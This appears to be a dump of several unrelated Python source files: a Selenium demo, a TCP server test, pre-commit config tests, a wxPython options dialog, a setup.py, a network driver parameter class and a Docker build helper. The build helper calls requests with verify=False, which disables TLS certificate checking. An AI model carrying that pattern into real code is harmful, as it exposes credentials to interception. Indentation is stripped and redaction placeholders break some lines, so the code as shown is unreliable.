element = WebDriverWait(browser, 3).until(EC.presence_of_element_located((By.ID, 'input-254')))
except TimeoutException:
print("Loading took too much time!")
search = browser.find_elements(By.ID,'input-254')[0]
search.send_keys('Google Pixel 3')
elif(input == 4):
browser = webdriver.Safari()
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
elif(input == 5):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
time.sleep(2)
browser.find_element_by_class_name('si-button-data download-all').click()
data = browser.find_element_by_class_name('content content-breakpoint-gt-md')
dataList = data.find_elements_by_tag_name('li')
for item in dataList:
text = item.text
print(text)
elif(input == 6):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
element_to_hover_over = returnVisibleElement(browser.find_elements_by_xpath("//i[@class='material-icons'][contains(./text(),'help')]"))
elif(input == 7):
browser = webdriver.Chrome()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
element_to_hover_over = returnVisibleElement(browser.find_elements_by_xpath("//i[@class='material-icons'][contains(./text(),'help')]"))
        ## ActionChains are not supported in Safari but will work on other browsers
## https://github.com/seleniumhq/selenium-google-code-issue-archive/issues/4136
ActionChains(browser).click(element_to_hover_over).perform()
TouchActions(browser).long_press(element_to_hover_over).perform()
elif(input == 8):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
time.sleep(2)
data = browser.find_element_by_class_name('content content-breakpoint-gt-md')
dataList = data.find_elements_by_tag_name('li')
for item in dataList:
text = item.text
print(text)
browser.back()
print('\n' * 5) # For convenient visual
def returnVisibleElement(listOfInputElements):
for element in listOfInputElements:
if element.is_displayed():
return element
def printSelection():
print('Press:')
for i in range(0, len(EXAMPLES)):
print('',i,'to',EXAMPLES[i], sep = ' ')
if __name__ == '__main__':
while(True):
printSelection()
choice = input('Enter choice: ')
try:
choice = int(choice)
except ValueError:
print('Invalid input, stop program')
break
if(choice not in range(0,9)):
print('Invalid input, stop program')
break
run(int(choice), URL)
| 3.046875 | 3 |
AppTest/testTCPserver.py | STRATOLOGIC/SpacePyLibrary | 22 | 3483 | #!/usr/bin/env python3
#******************************************************************************
# (C) 2018, <NAME>, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Unit Tests *
#******************************************************************************
import sys
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import UTIL.SYS, UTIL.TASK, UTIL.TCP
#############
# constants #
#############
LINEBUFFERLEN = 256
###########
# classes #
###########
# =============================================================================
class TCPserver(UTIL.TCP.SingleClientServer):
"""Subclass of UTIL.TCP.SingleClientServer"""
# ---------------------------------------------------------------------------
def __init__(self, portNr):
"""Initialise attributes only"""
modelTask = UTIL.TASK.s_processingTask
UTIL.TCP.SingleClientServer.__init__(self, modelTask, portNr)
self.tcpLineBuffer = ""
# ---------------------------------------------------------------------------
def receiveCallback(self, socket, stateMask):
"""Callback when a client has send data"""
LOG("*** receiveCallback ***")
# read the next set of byte from the data socket
data = self.recv(LINEBUFFERLEN)
    if data is None:
# client is automatically disconnected
return
tcpLineBuffer = self.tcpLineBuffer
tcpLineBuffer += data.decode("ascii")
LOG("tcpLineBuffer: " + tcpLineBuffer)
# handle the input: extract the lines from the line buffer
lines = tcpLineBuffer.split("\n")
# the last line has to be handled in a special way and can not be
# processed directly
lastLine = lines[-1]
lines = lines[:-1]
if lastLine == "":
# read of the data was complete (incl. "\n")
pass
else:
      # last line was cut off and the rest should come with the next read
self.tcpLineBuffer = lastLine
for line in lines:
# remove a terminating "\r" for clients like telnet
if line[-1] == "\r":
line = line[:-1]
# terminate the client connection if exit has been entered (case insensitive)
upperLine = line.upper()
if (upperLine == "X") or (upperLine == "EXIT"):
LOG("Exit requested")
# send the OK response back to the client
retString = "OK\n"
self.send(retString.encode())
# terminate the client connection
        self.disconnectClient()
return
if (upperLine == "Q") or (upperLine == "QUIT"):
LOG("Quit requested")
# send the OK response back to the client
retString = "OK\n"
self.send(retString.encode())
# terminate the client connection
        self.disconnectClient()
sys.exit(0)
# delegate the input
      pstatus = self.processLine(line)
if pstatus == 0:
LOG("OK")
# send the OK response back to the TECO
retString = "OK\n";
self.send(retString.encode())
else:
LOG_ERROR(str(pstatus))
        # send the Error response back to the client:
retString = "Error: execution failed (see log)!\n"
self.send(retString.encode())
# ---------------------------------------------------------------------------
def processLine(self, line):
"""Callback when a client has send a data line"""
LOG("line = " + line)
return 0
#############
# functions #
#############
# -----------------------------------------------------------------------------
def initConfiguration():
"""initialise the system configuration"""
UTIL.SYS.s_configuration.setDefaults([
["HOST", "127.0.0.1"],
["SERVER_PORT", "1234"]])
# -----------------------------------------------------------------------------
def createServer():
"""create the TCP server"""
server = TCPserver(portNr=int(UTIL.SYS.s_configuration.SERVER_PORT))
if not server.openConnectPort(UTIL.SYS.s_configuration.HOST):
sys.exit(-1)
# activate zyclic idle function
idleFunction()
# -----------------------------------------------------------------------------
def idleFunction():
UTIL.TASK.s_processingTask.createTimeHandler(1000, idleFunction)
LOG("--- idle ---")
########
# main #
########
if __name__ == "__main__":
# initialise the system configuration
initConfiguration()
# initialise the console handler
consoleHandler = UTIL.TASK.ConsoleHandler()
# initialise the model
modelTask = UTIL.TASK.ProcessingTask(isParent=True)
# register the console handler
modelTask.registerConsoleHandler(consoleHandler)
# create the TCP server
LOG("Open the TCP server")
createServer()
# start the tasks
LOG("start modelTask...")
modelTask.start()
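# Hedged usage sketch (not part of the test): once the server is listening,
# a line-based client can exercise processLine(); host/port mirror the
# defaults configured above.
#   import socket
#   with socket.create_connection(("127.0.0.1", 1234)) as s:
#       s.sendall(b"hello\n")   # server logs the line and answers "OK\n"
#       print(s.recv(16))
#       s.sendall(b"exit\n")    # disconnects only this client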
| 1.632813 | 2 |
tests/clientlib_test.py | yoavcaspi/pre-commit | 0 | 3484 | <reponame>yoavcaspi/pre-commit
from __future__ import unicode_literals
import logging
import cfgv
import pytest
import pre_commit.constants as C
from pre_commit.clientlib import check_type_tag
from pre_commit.clientlib import CONFIG_HOOK_DICT
from pre_commit.clientlib import CONFIG_REPO_DICT
from pre_commit.clientlib import CONFIG_SCHEMA
from pre_commit.clientlib import DEFAULT_LANGUAGE_VERSION
from pre_commit.clientlib import MANIFEST_SCHEMA
from pre_commit.clientlib import MigrateShaToRev
from pre_commit.clientlib import validate_config_main
from pre_commit.clientlib import validate_manifest_main
from testing.fixtures import sample_local_config
def is_valid_according_to_schema(obj, obj_schema):
try:
cfgv.validate(obj, obj_schema)
return True
except cfgv.ValidationError:
return False
@pytest.mark.parametrize('value', ('definitely-not-a-tag', 'fiel'))
def test_check_type_tag_failures(value):
with pytest.raises(cfgv.ValidationError):
check_type_tag(value)
@pytest.mark.parametrize(
('config_obj', 'expected'), (
(
{
'repos': [{
'repo': 'git<EMAIL>:pre-commit/pre-commit-hooks',
'rev': 'cd74dc150c142c3be70b24eaf0b02cae9d235f37',
'hooks': [{'id': 'pyflakes', 'files': '\\.py$'}],
}],
},
True,
),
(
{
'repos': [{
'repo': '<EMAIL>:pre-commit/pre-commit-hooks',
'rev': 'cd74dc150c142c3be70b24eaf0b02cae9d235f37',
'hooks': [
{
'id': 'pyflakes',
'files': '\\.py$',
'args': ['foo', 'bar', 'baz'],
},
],
}],
},
True,
),
(
{
'repos': [{
'repo': '<EMAIL>:pre-commit/pre-commit-hooks',
'rev': 'cd74dc150c142c3be70b24eaf0b02cae9d235f37',
'hooks': [
{
'id': 'pyflakes',
'files': '\\.py$',
# Exclude pattern must be a string
'exclude': 0,
'args': ['foo', 'bar', 'baz'],
},
],
}],
},
False,
),
),
)
def test_config_valid(config_obj, expected):
ret = is_valid_according_to_schema(config_obj, CONFIG_SCHEMA)
assert ret is expected
def test_local_hooks_with_rev_fails():
config_obj = {'repos': [dict(sample_local_config(), rev='foo')]}
with pytest.raises(cfgv.ValidationError):
cfgv.validate(config_obj, CONFIG_SCHEMA)
def test_config_with_local_hooks_definition_passes():
config_obj = {'repos': [sample_local_config()]}
cfgv.validate(config_obj, CONFIG_SCHEMA)
def test_config_schema_does_not_contain_defaults():
"""Due to the way our merging works, if this schema has any defaults they
will clobber potentially useful values in the backing manifest. #227
"""
for item in CONFIG_HOOK_DICT.items:
assert not isinstance(item, cfgv.Optional)
def test_validate_manifest_main_ok():
assert not validate_manifest_main(('.pre-commit-hooks.yaml',))
def test_validate_config_main_ok():
assert not validate_config_main(('.pre-commit-config.yaml',))
def test_validate_config_old_list_format_ok(tmpdir):
f = tmpdir.join('cfg.yaml')
f.write('- {repo: meta, hooks: [{id: identity}]}')
assert not validate_config_main((f.strpath,))
def test_validate_warn_on_unknown_keys_at_repo_level(tmpdir, caplog):
f = tmpdir.join('cfg.yaml')
f.write(
'- repo: https://gitlab.com/pycqa/flake8\n'
' rev: 3.7.7\n'
' hooks:\n'
' - id: flake8\n'
' args: [--some-args]\n',
)
ret_val = validate_config_main((f.strpath,))
assert not ret_val
assert caplog.record_tuples == [
(
'pre_commit',
logging.WARNING,
'Unexpected config key(s): args',
),
]
def test_validate_warn_on_unknown_keys_at_top_level(tmpdir, caplog):
f = tmpdir.join('cfg.yaml')
f.write(
'repos:\n'
'- repo: https://gitlab.com/pycqa/flake8\n'
' rev: 3.7.7\n'
' hooks:\n'
' - id: flake8\n'
'foo:\n'
' id: 1.0.0\n',
)
ret_val = validate_config_main((f.strpath,))
assert not ret_val
assert caplog.record_tuples == [
(
'pre_commit',
logging.WARNING,
'Unexpected config key(s): foo',
),
]
@pytest.mark.parametrize('fn', (validate_config_main, validate_manifest_main))
def test_mains_not_ok(tmpdir, fn):
not_yaml = tmpdir.join('f.notyaml')
not_yaml.write('{')
not_schema = tmpdir.join('notconfig.yaml')
not_schema.write('{}')
assert fn(('does-not-exist',))
assert fn((not_yaml.strpath,))
assert fn((not_schema.strpath,))
@pytest.mark.parametrize(
('manifest_obj', 'expected'),
(
(
[{
'id': 'a',
'name': 'b',
'entry': 'c',
'language': 'python',
'files': r'\.py$',
}],
True,
),
(
[{
'id': 'a',
'name': 'b',
'entry': 'c',
'language': 'python',
'language_version': 'python3.4',
'files': r'\.py$',
}],
True,
),
(
# A regression in 0.13.5: always_run and files are permissible
[{
'id': 'a',
'name': 'b',
'entry': 'c',
'language': 'python',
'files': '',
'always_run': True,
}],
True,
),
),
)
def test_valid_manifests(manifest_obj, expected):
ret = is_valid_according_to_schema(manifest_obj, MANIFEST_SCHEMA)
assert ret is expected
@pytest.mark.parametrize(
'dct',
(
{'repo': 'local'}, {'repo': 'meta'},
{'repo': 'wat', 'sha': 'wat'}, {'repo': 'wat', 'rev': 'wat'},
),
)
def test_migrate_sha_to_rev_ok(dct):
MigrateShaToRev().check(dct)
def test_migrate_sha_to_rev_dont_specify_both():
with pytest.raises(cfgv.ValidationError) as excinfo:
MigrateShaToRev().check({'repo': 'a', 'sha': 'b', 'rev': 'c'})
msg, = excinfo.value.args
assert msg == 'Cannot specify both sha and rev'
@pytest.mark.parametrize(
'dct',
(
{'repo': 'a'},
{'repo': 'meta', 'sha': 'a'}, {'repo': 'meta', 'rev': 'a'},
),
)
def test_migrate_sha_to_rev_conditional_check_failures(dct):
with pytest.raises(cfgv.ValidationError):
MigrateShaToRev().check(dct)
def test_migrate_to_sha_apply_default():
dct = {'repo': 'a', 'sha': 'b'}
MigrateShaToRev().apply_default(dct)
assert dct == {'repo': 'a', 'rev': 'b'}
def test_migrate_to_sha_ok():
dct = {'repo': 'a', 'rev': 'b'}
MigrateShaToRev().apply_default(dct)
assert dct == {'repo': 'a', 'rev': 'b'}
@pytest.mark.parametrize(
'config_repo',
(
# i-dont-exist isn't a valid hook
{'repo': 'meta', 'hooks': [{'id': 'i-dont-exist'}]},
# invalid to set a language for a meta hook
{'repo': 'meta', 'hooks': [{'id': 'identity', 'language': 'python'}]},
# name override must be string
{'repo': 'meta', 'hooks': [{'id': 'identity', 'name': False}]},
),
)
def test_meta_hook_invalid(config_repo):
with pytest.raises(cfgv.ValidationError):
cfgv.validate(config_repo, CONFIG_REPO_DICT)
@pytest.mark.parametrize(
'mapping',
(
# invalid language key
{'pony': '1.0'},
# not a string for version
{'python': 3},
),
)
def test_default_language_version_invalid(mapping):
with pytest.raises(cfgv.ValidationError):
cfgv.validate(mapping, DEFAULT_LANGUAGE_VERSION)
def test_minimum_pre_commit_version_failing():
with pytest.raises(cfgv.ValidationError) as excinfo:
cfg = {'repos': [], 'minimum_pre_commit_version': '999'}
cfgv.validate(cfg, CONFIG_SCHEMA)
assert str(excinfo.value) == (
'\n'
'==> At Config()\n'
'==> At key: minimum_pre_commit_version\n'
'=====> pre-commit version 999 is required but version {} is '
'installed. Perhaps run `pip install --upgrade pre-commit`.'.format(
C.VERSION,
)
)
def test_minimum_pre_commit_version_passing():
cfg = {'repos': [], 'minimum_pre_commit_version': '0'}
cfgv.validate(cfg, CONFIG_SCHEMA)
@pytest.mark.parametrize('schema', (CONFIG_SCHEMA, CONFIG_REPO_DICT))
def test_warn_additional(schema):
allowed_keys = {item.key for item in schema.items if hasattr(item, 'key')}
warn_additional, = [
x for x in schema.items if isinstance(x, cfgv.WarnAdditionalKeys)
]
assert allowed_keys == set(warn_additional.keys)
| 1.804688 | 2 |
ikalog/ui/options.py | fetus-hina/IkaLog | 285 | 3485 | <reponame>fetus-hina/IkaLog
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gettext
import wx
import wx.lib.scrolledpanel
import ikalog.outputs
from ikalog.ui.events import *
from ikalog.ui.panel import *
from ikalog.ui import VideoCapture
from ikalog.utils import *
_ = Localization.gettext_translation('IkaUI', fallback=True).gettext
class OptionsGUI(object):
def __init__(self, ikalog_gui):
self.ikalog_gui = ikalog_gui
self.frame = None
self._init_frame()
def _init_frame(self):
if self.frame:
return
self.frame = wx.Frame(
self.ikalog_gui.frame, wx.ID_ANY, _("Options"), size=(640, 500))
self.notebook = wx.Notebook(self.frame, wx.ID_ANY)
# Apply button
button_apply = wx.Button(self.frame, wx.ID_ANY, _(u'Apply'))
# Use a bold font.
apply_font = button_apply.GetFont()
apply_font.SetWeight(wx.FONTWEIGHT_BOLD)
button_apply.SetFont(apply_font)
button_cancel = wx.Button(self.frame, wx.ID_ANY, _(u'Cancel'))
button_load_default = wx.Button(
self.frame, wx.ID_ANY, _(u'Load default'))
buttons_sizer = wx.BoxSizer(wx.HORIZONTAL)
buttons_sizer.Add(button_apply)
buttons_sizer.Add(button_cancel)
buttons_sizer.Add(button_load_default)
top_sizer = wx.BoxSizer(wx.VERTICAL)
top_sizer.Add(self.notebook)
top_sizer.Add(buttons_sizer)
self.frame.SetSizer(top_sizer)
# Set event handlers for buttons.
button_apply.Bind(wx.EVT_BUTTON, self.on_button_apply)
button_cancel.Bind(wx.EVT_BUTTON, self.on_button_cancel)
button_load_default.Bind(wx.EVT_BUTTON, self.on_button_load_default)
outputs = [self.ikalog_gui.capture] + self.ikalog_gui.outputs
self._init_outputs(outputs)
# self.capture.panel is a part of self.frame. This Bind propagates
# capture's source change to the preview.
self.ikalog_gui.capture.panel.Bind(
EVT_INPUT_INITIALIZED, self.ikalog_gui.on_input_initialized)
# Refresh UI of each plugin.
self.ikalog_gui.engine.call_plugins(
'on_config_load_from_context', debug=True)
def show(self):
if not self.frame:
self._init_frame()
self.frame.Show()
self.frame.Raise()
def on_button_apply(self, event):
self.ikalog_gui.on_options_apply(event)
def on_button_cancel(self, event):
self.ikalog_gui.on_options_cancel(event)
def on_button_load_default(self, event):
self.ikalog_gui.on_options_load_default(event)
def _init_outputs(self, outputs):
output_dict = {}
for output in outputs:
output_dict[output.__class__] = output
# Keys for outputs in the main page.
keys = [
ikalog.ui.VideoCapture,
ikalog.outputs.OBS,
ikalog.outputs.StatInk,
ikalog.outputs.Twitter
]
# Keys for outputs combined into the misc tab.
misc_keys = [
ikalog.outputs.CSV,
ikalog.outputs.JSON,
ikalog.outputs.Screenshot,
ikalog.outputs.Boyomi,
ikalog.outputs.Slack,
ikalog.outputs.WebSocketServer,
]
for key in output_dict.keys():
if key in misc_keys:
continue
if key not in keys:
keys.append(key)
# Main tabs
index = 0
for key in keys:
output = output_dict.get(key)
if not output:
continue
output.on_option_tab_create(self.notebook)
self.notebook.InsertPage(index, output.panel, output.panel_name)
index += 1
# Misc tab
self.misc_panel = wx.lib.scrolledpanel.ScrolledPanel(
self.notebook, wx.ID_ANY, size=(640, 360))
self.misc_panel_sizer = wx.BoxSizer(wx.VERTICAL)
default_font = self.misc_panel.GetFont()
title_font = wx.Font(default_font.GetPointSize(),
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_BOLD)
for key in misc_keys:
output = output_dict.get(key)
if not output:
continue
output.on_option_tab_create(self.misc_panel)
title = wx.StaticText(self.misc_panel, wx.ID_ANY, output.panel_name)
title.SetFont(title_font)
self.misc_panel_sizer.Add(title)
self.misc_panel_sizer.Add(
output.panel, flag=wx.EXPAND | wx.ALL, border=10)
self.misc_panel_sizer.Add((-1, 25))
self.misc_panel.SetSizer(self.misc_panel_sizer)
self.misc_panel.SetupScrolling()
self.notebook.InsertPage(index, self.misc_panel, _('Misc.'))
| 2.03125 | 2 |
setup.py | CyberTKR/Simple-LINELIB | 4 | 3486 | from setuptools import setup, find_packages
with open("README.md", 'r',encoding="utf-8") as f:
long_description = f.read()
setup(
name='LineBot',
version='0.1.0',
description='Simple-LINELIB',
long_description=long_description,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/CyberTKR/Simple-LINELIB',
packages=find_packages(include=['CyberTK', 'CyberTK.*']),
install_requires=[
'httpx==0.19.0',
'requests',
'thrift',
'CyberTKAPI'
],
extras_require={'httpx': ['http2']}
)
| 1.34375 | 1 |
lib/SeparateDriver/CgwshDeviceDriverSetParameterECDB.py | multi-service-fabric/element-manager | 0 | 3487 | <filename>lib/SeparateDriver/CgwshDeviceDriverSetParameterECDB.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright(c) 2019 Nippon Telegraph and Telephone Corporation
# Filename: CgwshDeviceDriverSetParameterECDB.py
'''
Parameter module for Cgwsh driver configuration
'''
import GlobalModule
from EmCommonLog import decorater_log
from DriverSetParameterECDB import DriverSetParameterECDB
class CgwshDeviceDriverSetParameterECDB(DriverSetParameterECDB):
'''
Parameter class for Cgwsh driver configuration
'''
@decorater_log
def __init__(self,
device_name=None,
ec_message=None,
db_info=None):
'''
Constructor
'''
super(CgwshDeviceDriverSetParameterECDB, self).__init__(device_name,
ec_message,
db_info)
self.ec_message = self.ec_message["device"]
@decorater_log
def get_service_info(self):
'''
Service information is acquired.
'''
pass
@decorater_log
def get_management_info(self):
'''
Management information is acquired.
'''
get_info = {}
get_info["device_name"] = self.ec_message.get("name")
GlobalModule.EM_LOGGER.debug("get management_info = %s" % (get_info,))
return get_info
@decorater_log
def get_static_route_info(self):
'''
Static route information is acquired.
acquired dict:
{
static_route:[{
ip_address:str,
subnet_mask:str,
gateway_address:str
}]
}
'''
get_info = {}
tmp_list = []
routes = self.ec_message.get("serviceInfo", {}).get("staticRoute", ())
for route in routes:
tmp_item = {}
tmp_item["ip_address"] = route.get("ipAddress")
tmp_item["subnet_mask"] = route.get("subnetMask")
tmp_item["gateway_address"] = route.get("gatewayIpAddress")
tmp_list.append(tmp_item)
get_info["static_route"] = tmp_list
GlobalModule.EM_LOGGER.debug("get static_route = %s" % (get_info,))
return get_info
@decorater_log
def get_tunnel_if_info(self):
'''
Tunnel interface information is acquired.
acquired dict:
{
tunnel_if:[{
vrf_name:str,
if_name:str,
uni_if_name:str,
uni_vlan_id:str,
tunnel_source:str,
}]
}
'''
get_info = {}
tmp_list = []
tunnel_uni = self.ec_message.get("serviceInfo", {}).get("uni", ())
tunnel_officeInfo = self.ec_message.get(
"serviceInfo", {}).get("officeInfo", ())
vrf_name = tunnel_uni.get("vrfName")
uni_if_name = tunnel_uni.get("ifName")
uni_vlan_id = tunnel_uni.get("vlanId")
for tunnel in tunnel_officeInfo:
tmp_item = {}
tmp_item["vrf_name"] = vrf_name
tmp_item["if_name"] = tunnel.get("tunnelIfName")
tmp_item["uni_if_name"] = uni_if_name
tmp_item["uni_vlan_id"] = uni_vlan_id
tmp_item["tunnel_source"] = tunnel.get(
"tunnelSrcIpAddress")
tmp_list.append(tmp_item)
get_info["tunnel_if"] = tmp_list
GlobalModule.EM_LOGGER.debug("get tunnel_if = %s" % (get_info,))
return get_info
@decorater_log
def get_pppoe_info(self):
'''
PPPoE information is acquired.
acquired dict:
{
pppoe:[{
username:str,
password:str,
tenant:str,
pp_no:str
}]
}
'''
get_info = {}
tmp_list = []
ppp_infos = self.ec_message.get("serviceInfo", {}).get("pppInfo", ())
for ppp_info in ppp_infos:
tmp_item = {}
tmp_item["username"] = ppp_info.get("connectionId")
tmp_item["password"] = <PASSWORD>.get("connectionPassword")
tmp_item["tenant"] = ppp_info.get("corporationId")
tmp_item["pp_no"] = ppp_info.get("ppId")
tmp_list.append(tmp_item)
get_info["pppoe"] = tmp_list
GlobalModule.EM_LOGGER.debug("get pppoe = %s" % (get_info,))
return get_info
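# Hedged illustration (not part of the original driver): the EC message is
# expected to carry a top-level "device" object, roughly
#   {"device": {"name": "cgwsh01",
#               "serviceInfo": {"uni": {...}, "officeInfo": [...],
#                               "pppInfo": [...], "staticRoute": [...]}}}
# where "cgwsh01" is a made-up device name used only for this sketch.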
| 2.015625 | 2 |
scripts/common_lib/build_lib.py | Bhaskers-Blu-Org1/wc-devops-utilities | 15 | 3488 | <filename>scripts/common_lib/build_lib.py
#!/usr/bin/env python3.6
import os
import subprocess
import json
import argparse
import zipfile
import shutil
import requests
import datetime
import re
import operator
import unicodedata
# global list of error messages to keep track of all error msgs
errorMessages = []
"""
Collection of Common Functions used by Build Scripts
A collection of common functions shared by each individual build scripts.
"""
def get(url, usr, pwd):
"""
HTTP/HTTPS GET requests using external Python module requests
@param url the url of the REST call
@param usr the functional username for the docker registry
@param pwd the password for the docker registry functional user
@return a JSON response
"""
headers = {
'Accept': 'application/vnd.docker.distribution.manifest.v1+json',
}
# TEMP: Remove the suppressed verification once the docker cert location
# is figured out and we specify it in REQUESTS_CA_BUNDLE
return requests.get(url, auth=(usr, pwd), headers=headers, verify=False)
def get_latest_tag(registry_path, usr, pwd):
"""
Retrieve the latest version of an image based on its tags: vX-YYYYMMDD-HHmm.
The latest, by definition, is defined to be the one with the highest version
number (vX) and the latest timestamp (YYYYMMDD-HHmm).
@param registry_path docker registry path
@param usr the functional username for the docker registry
@param pwd the password for the docker registry functional user
@return the latest image tag
"""
tag_list_url = registry_path + '/tags/list'
request = get(tag_list_url, usr, pwd)
tag_list = json.loads(request.text)
for tag in tag_list['tags']:
if '-' not in tag:
continue
str_version, str_dash, str_timestamp = tag.partition('-')
tag_format="%Y%m%d-%H%M"
try:
dt_timestamp = datetime.datetime.strptime(str_timestamp, tag_format)
except ValueError:
continue
try:
latest_version
latest_timestamp
latest_tag
except NameError:
latest_version = str_version
latest_timestamp = dt_timestamp
latest_tag = tag
else:
if latest_version > str_version:
continue
elif latest_version < str_version:
latest_version = str_version
latest_timestamp = dt_timestamp
latest_tag = tag
else:
if latest_timestamp < dt_timestamp:
latest_timestamp = dt_timestamp
latest_tag = tag
return latest_tag
def unzip(zip_file, to_dir):
"""
Generic unzip function for extracting zip files
@param zip_file the zip file to be extracted
@param to_dir the destination directory to extract the zip file to
"""
with zipfile.ZipFile(zip_file, "r") as zip_ref:
zip_ref.extractall(to_dir)
zip_ref.close()
def create_dockerfile(dockerfile_parent_dir, docker_url, image_namespace, image_name, image_tag_latest):
"""
Creates a dockerfile using the correct docker registry URL associated
with the datacenter this script is being run on
:param str dockerfile_parent_dir: path to the parent directory for the Dockerfile
:param str docker_url: the docker registry VIP accessible from the mesos slaves
:param str image_namespace: the name of the image
:param str image_name: the name of the image
:param str image_tag_latest: the latest version tag of the base image
:returns: None
"""
# Form the path for the Dockerfile based on the parent of the caller script
dockerfile_path = os.path.join(dockerfile_parent_dir, "Dockerfile")
# Create the Dockerfile
dockerfile = open(dockerfile_path, "w+")
# Format the FROM command
dockerfile_from_cmd = "FROM " + docker_url + image_namespace + "/" + image_name + ":" + image_tag_latest
# Write the FROM command string to the Dockerfile
dockerfile.write(dockerfile_from_cmd)
# Close the open file instance
dockerfile.close()
def set_docker_client_timeout():
"""
Sets the DOCKER_CLIENT_TIMEOUT environment variable to 300
"""
os.environ['DOCKER_CLIENT_TIMEOUT'] = '300'
print("The timeout set for docker client: " + os.environ['DOCKER_CLIENT_TIMEOUT'] + " seconds")
# ======================= verify bundle Structure ===============================================
def openJSONfile(jsonFile):
"""
Function to open a JSON file
@param jsonFile path to the JSON file
@return the loaded JSON file
"""
try:
with open(jsonFile) as json_data_file:
data = json.load(json_data_file)
except:
addToErrorMessages("The specified JSON file is not valid: " + jsonFile)
raise
return data
def directoryToJSON(directory):
"""
Function to convert objects in a given directory into JSON form.
The parent object is always a dict, it may contain children if type=directory.
A directory is composed of a list and may contain files and/or directories.
@param directory directory to convert
@return JSON representation of a directory
"""
d = {'name': os.path.basename(directory)} # the parent object is dict
if os.path.isdir(directory):
d['type'] = "directory"
# directory may have children
# the children in a directory is a list composed of more files/directories
d['children'] = [directoryToJSON(os.path.join(directory,x)) for x in os.listdir(directory)]
else:
d['type'] = "file"
return d
def verifyBundleStructure(expected, actual, currentPath):
"""
Function to verify if an uploaded bundle follows IBM defined structure
@param expected the JSON representation of the IBM defined structure
@param actual the JSON representation of the actual structure of the uploaded bundle
@param currentPath the path currently being checked (used to build paths recursively for error msg)
@return True if structure of the uploaded bundle follows IBM defined structure. False otherwise.
"""
isMatched = True
if type(expected) is dict:
if matches(expected,actual): # a matching file or directory was found
if expected['type'] == 'directory':
currentPath = currentPath + actual['name'] + "/"
if expected['children'] == "_any":
isMatched = isMatched & True # if the contents of the directory can be anything then do no further checking
else:
isMatched = isMatched & verifyBundleStructure(expected['children'], actual['children'], currentPath) # do further checking
else: # a matching file or directory was not found
if expected['fail-if-not-found'] == "yes":
logBundleStructureErrorMessage(expected, currentPath)
return False
if type(expected) is list:
for k in range(0,len(expected)):
isMatched = isMatched & verifyActualContainsExpectedElement(actual, expected[k], currentPath, isMatched)
return isMatched
def logBundleStructureErrorMessage(expected, currentPath):
"""
Function to adds error messages to the global array.
@param expected the expected element
@param currentPath the current path we are on that has the missing file or directory
"""
addToErrorMessages("A "+ expected['type'] +" is missing from the path: \"" + currentPath + "\"")
addToErrorMessages(expected['error-message-if-fails'])
return
def matches(expectedElement, actualElement):
"""
Function to check if files/directories match. They must have the same name and must both be the same type.
@param expectedElement the expected element. May be defined by regular expression
@param actualElement the actual element
"""
ret = False
if re.fullmatch(expectedElement['name'], actualElement['name']) is not None and expectedElement['type'] == actualElement['type']:
ret = True
return ret
def verifyActualContainsExpectedElement(actual, expectedElement, currentPath, isMatched):
"""
Function to verify if an actual list of objects contains an expected element. Helper method to verifyBundleStructure.
@param actual list of the actual files and directories in the bundle
@param expectedElement the expected element to find in the bundle
@param currentPath the path currently being checked (used to build paths recursively for error msg)
@param isMatched (only used for recursive calls)
@return True if the list of actual objects contain the expected element
"""
# if actual is a dict then verify it and its children
if type(actual) is dict:
isMatched = isMatched & verifyBundleStructure(expectedElement,actual, currentPath)
# if actual is a list then find out if they match anywhere, if so get the matched position
elif type(actual) is list:
matchedPosition = -1
for i in range(0, len(actual)):
if matches(expectedElement,actual[i]):
matchedPosition = i
break
if matchedPosition != -1: # if they match then verify their children too
isMatched = isMatched & verifyBundleStructure(expectedElement, actual[matchedPosition] , currentPath)
else : # if they don't match then log the error msg and return false
if expectedElement['fail-if-not-found'] == "yes": # log error msg and return false if needed
isMatched = False
logBundleStructureErrorMessage(expectedElement, currentPath)
return isMatched
def addToErrorMessages(errorMessage):
"""
Function to add error messages to the global list of errorMessages
@param errorMessage the error message to add
"""
print(errorMessage)
    global errorMessages
errorMessages.extend([errorMessage])
return
def unzipRecursively(zipFileName, directoryToUnzipTo):
"""
Function to unzip a ZIP file recursively
@param zipFileName the zip file to be extracted
@param directoryToUnzipTo the destination directory to extract the zip file to
"""
# update
if zipFileName.endswith(".zip"): #check if it's a .zip
unzip(zipFileName,directoryToUnzipTo)
os.remove(zipFileName)
for x in os.listdir(directoryToUnzipTo):
subdirectory = os.path.join(directoryToUnzipTo, os.path.splitext(x)[0])
subfile = os.path.join(directoryToUnzipTo, x )
